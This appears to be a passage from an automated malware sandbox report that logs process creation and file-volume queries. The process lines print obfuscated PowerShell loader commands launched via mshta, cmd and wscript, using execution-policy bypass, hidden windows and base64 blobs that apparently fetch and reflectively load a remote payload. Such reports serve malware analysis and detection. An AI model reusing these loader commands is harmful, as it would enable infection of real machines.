lzgjlc3r0agluz3n3axrozw5lcmd5bgv2zwxnb29kzm9yynvzaw5lc3mudmjtiiwwldapo3n0qvjulxnsrwvqkdmpo0luvm9rrs1lefbyrxnzau9oicagicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrozw5lcmd5bgv2zwxnb29kzm9yynvzaw5lc3mudmjtig=='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfkydxezsjnpbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfezc1uevblicagicagicagicagicagicagicagicagicagicagicagic1nru1izxjkzuzpbkl0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvumxtt24uzgxsiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbxam9vqkhyyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaga2jnzwflcxosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagiejldlzrwgzvckzulhvpbnqgicagicagicagicagicagicagicagicagicagicagicagvkr5rxpmdnmssw50uhryicagicagicagicagicagicagicagicagicagicagicagifvpyxfnrlpbvwlektsnicagicagicagicagicagicagicagicagicagicagicagic1uyw1ficagicagicagicagicagicagicagicagicagicagicagicjsu0siicagicagicagicagicagicagicagicagicagicagicagic1oqu1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicagthggicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakwtj1ctnkm2lsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmjmzl2nyzwf0zwrizxn0dghpbmdzd2l0agvuzxjnewxldmvsz29vzgzvcmj1c2luzxnzchvyb3bzzs50suyilcikru52okfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrozw5lcmd5bgv2zwxnb29kzm9yynvzaw5lc3mudmjtiiwwldapo3n0qvjulxnsrwvqkdmpo0luvm9rrs1lefbyrxnzau9oicagicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrozw5lcmd5bgv2zwxnb29kzm9yynvzaw5lc3mudmjtig=='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $cyclooctadiene = 'jghpy2n1chbpbmcgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzskchjpbxbpbmcgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrtb3zpbmdzid0gjhbyaw1waw5nlkrvd25sb2fkrgf0ysgkagljy3vwcgluzyk7jgfuc2vyzxmgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkbw92aw5ncyk7jgzsdxr0zxjiesa9icc8pejbu0u2nf9tvefsvd4+jzskagfta2luid0gjzw8qkftrty0x0vord4+jzskdw5ncmlldmluzya9icrhbnnlcmvzlkluzgv4t2yojgzsdxr0zxjiesk7jgnvbnryyxzlbmvyid0gjgfuc2vyzxmusw5kzxhpzigkagfta2luktskdw5ncmlldmluzyatz2ugmcatyw5kicrjb250cmf2zw5lciatz3qgjhvuz3jpzxzpbmc7jhvuz3jpzxzpbmcgkz0gjgzsdxr0zxjies5mzw5ndgg7jhnub3dtb2jpbgugpsaky29udhjhdmvuzxiglsakdw5ncmlldmluzzskd2hvcnrszsa9icrhbnnlcmvzlln1ynn0cmluzygkdw5ncmlldmluzywgjhnub3dtb2jpbgupoyryzxzlywxlzca9ic1qb2luicgkd2hvcnrszs5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkd2hvcnrszs5mzw5ndggpxtskbwfza2luzya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhjldmvhbgvkktskdhjhbnnvy2vhbmljid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkbwfza2luzyk7jfroyxrjagvyaxnlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jfroyxrjagvyaxnllkludm9rzsgkbnvsbcwgqcgnmc8xtdj0zs9yl2vllmv0c2fwly86c3b0dggnlcanjhrob21zb25pyw5pc20nlcanjhrob21zb25pyw5pc20nlcanjhrob21zb25pyw5pc20nlcanyxnwbmv0x2nvbxbpbgvyjywgjyr0ag9tc29uawfuaxntjywgjyr0ag9tc29uawfuaxntjywnjhrob21zb25pyw5pc20nlcckdghvbxnvbmlhbmlzbscsjyr0ag9tc29uawfuaxntjywnjhrob21zb25pyw5pc20nlcckdghvbxnvbmlhbmlzbscsjzenlcckdghvbxnvbmlhbmlzbscsjycpkts=';$italicizing = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($cyclooctadiene));invoke-expression $italicizing
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfkydxezsjnpbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfezc1uevblicagicagicagicagicagicagicagicagicagicagicagic1nru1izxjkzuzpbkl0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvumxtt24uzgxsiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbxam9vqkhyyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaga2jnzwflcxosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagiejldlzrwgzvckzulhvpbnqgicagicagicagicagicagicagicagicagicagicagicagvkr5rxpmdnmssw50uhryicagicagicagicagicagicagicagicagicagicagicagifvpyxfnrlpbvwlektsnicagicagicagicagicagicagicagicagicagicagicagic1uyw1ficagicagicagicagicagicagicagicagicagicagicagicjsu0siicagicagicagicagicagicagicagicagicagicagicagic1oqu1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicagthggicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakwtj1ctnkm2lsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmjmzl2nyzwf0zwrizxn0dghpbmdzd2l0agvuzxjnewxldmvsz29vzgzvcmj1c2luzxnzchvyb3bzzs50suyilcikru52okfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrozw5lcmd5bgv2zwxnb29kzm9yynvzaw5lc3mudmjtiiwwldapo3n0qvjulxnsrwvqkdmpo0luvm9rrs1lefbyrxnzau9oicagicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrozw5lcmd5bgv2zwxnb29kzm9yynvzaw5lc3mudmjtig=='+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfkydxezsjnpbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfezc1uevblicagicagicagicagicagicagicagicagicagicagicagic1nru1izxjkzuzpbkl0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvumxtt24uzgxsiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbxam9vqkhyyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaga2jnzwflcxosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagiejldlzrwgzvckzulhvpbnqgicagicagicagicagicagicagicagicagicagicagicagvkr5rxpmdnmssw50uhryicagicagicagicagicagicagicagicagicagicagicagifvpyxfnrlpbvwlektsnicagicagicagicagicagicagicagicagicagicagicagic1uyw1ficagicagicagicagicagicagicagicagicagicagicagicjsu0siicagicagicagicagicagicagicagicagicagicagicagic1oqu1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicagthggicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakwtj1ctnkm2lsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmjmzl2nyzwf0zwrizxn0dghpbmdzd2l0agvuzxjnewxldmvsz29vzgzvcmj1c2luzxnzchvyb3bzzs50suyilcikru52okfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrozw5lcmd5bgv2zwxnb29kzm9yynvzaw5lc3mudmjtiiwwldapo3n0qvjulxnsrwvqkdmpo0luvm9rrs1lefbyrxnzau9oicagicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrozw5lcmd5bgv2zwxnb29kzm9yynvzaw5lc3mudmjtig=='+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $cyclooctadiene = 'jghpy2n1chbpbmcgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzskchjpbxbpbmcgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrtb3zpbmdzid0gjhbyaw1waw5nlkrvd25sb2fkrgf0ysgkagljy3vwcgluzyk7jgfuc2vyzxmgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkbw92aw5ncyk7jgzsdxr0zxjiesa9icc8pejbu0u2nf9tvefsvd4+jzskagfta2luid0gjzw8qkftrty0x0vord4+jzskdw5ncmlldmluzya9icrhbnnlcmvzlkluzgv4t2yojgzsdxr0zxjiesk7jgnvbnryyxzlbmvyid0gjgfuc2vyzxmusw5kzxhpzigkagfta2luktskdw5ncmlldmluzyatz2ugmcatyw5kicrjb250cmf2zw5lciatz3qgjhvuz3jpzxzpbmc7jhvuz3jpzxzpbmcgkz0gjgzsdxr0zxjies5mzw5ndgg7jhnub3dtb2jpbgugpsaky29udhjhdmvuzxiglsakdw5ncmlldmluzzskd2hvcnrszsa9icrhbnnlcmvzlln1ynn0cmluzygkdw5ncmlldmluzywgjhnub3dtb2jpbgupoyryzxzlywxlzca9ic1qb2luicgkd2hvcnrszs5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkd2hvcnrszs5mzw5ndggpxtskbwfza2luzya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhjldmvhbgvkktskdhjhbnnvy2vhbmljid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkbwfza2luzyk7jfroyxrjagvyaxnlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jfroyxrjagvyaxnllkludm9rzsgkbnvsbcwgqcgnmc8xtdj0zs9yl2vllmv0c2fwly86c3b0dggnlcanjhrob21zb25pyw5pc20nlcanjhrob21zb25pyw5pc20nlcanjhrob21zb25pyw5pc20nlcanyxnwbmv0x2nvbxbpbgvyjywgjyr0ag9tc29uawfuaxntjywgjyr0ag9tc29uawfuaxntjywnjhrob21zb25pyw5pc20nlcckdghvbxnvbmlhbmlzbscsjyr0ag9tc29uawfuaxntjywnjhrob21zb25pyw5pc20nlcckdghvbxnvbmlhbmlzbscsjzenlcckdghvbxnvbmlhbmlzbscsjycpkts=';$italicizing = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($cyclooctadiene));invoke-expression $italicizing	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
